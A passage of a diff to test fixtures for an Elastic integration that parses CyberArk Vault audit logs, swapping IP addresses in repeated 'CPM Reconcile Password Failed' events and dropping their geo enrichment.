Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:12:22\",\"IsoTimestamp\":\"2021-03-11T21:12:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615497142\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -127,19 +116,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -159,7 +137,7 @@ }, "@timestamp": "2021-03-14T13:18:15.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -171,28 +149,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-14T13:18:15Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615727895\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"2\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615727895\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "2", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -203,9 +181,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615727895", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -219,8 +197,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176778300Z", - "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403073500Z", + "original": "\u003c7\u003e1 2021-03-14T13:18:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:18:15\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:18:15Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615727895\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:18:15\",\"IsoTimestamp\":\"2021-03-14T13:18:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=2;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"2\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615727895\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -248,17 +226,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -278,7 +247,7 @@ }, "@timestamp": "2021-03-14T13:46:13.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -290,27 +259,27 @@ ], "ip": [ "10.0.1.20", - "34.123.103.115" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", + "reason": "ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n", "iso_timestamp": "2021-03-14T13:46:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 